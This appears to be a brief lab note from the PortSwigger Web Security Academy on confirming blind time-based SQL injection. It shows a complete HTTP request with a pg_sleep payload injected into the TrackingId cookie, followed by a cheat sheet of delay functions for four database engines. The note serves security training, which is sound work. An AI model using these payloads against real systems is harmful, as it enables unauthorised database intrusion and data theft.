Try functions to perform a time delay in the response to conferm blind time based SQL
```
GET / HTTP/2
Host: 0a4d005b04b9093f803ec1d60073004e.web-security-academy.net
Cookie: TrackingId=kC3Z7T6HNQcHroBH'||pg_sleep(10)--; session=CJXSMGV72G78aS495RTAOMMkECwHUpna
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://portswigger.net/
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: cross-site
Sec-Fetch-User: ?1
Te: trailers
```

### Time delay
Oracle 	`dbms_pipe.receive_message(('a'),10)`
Microsoft 	`WAITFOR DELAY '0:0:10'`
PostgreSQL 	`SELECT pg_sleep(10)`
MySQL 	`SELECT SLEEP(10)`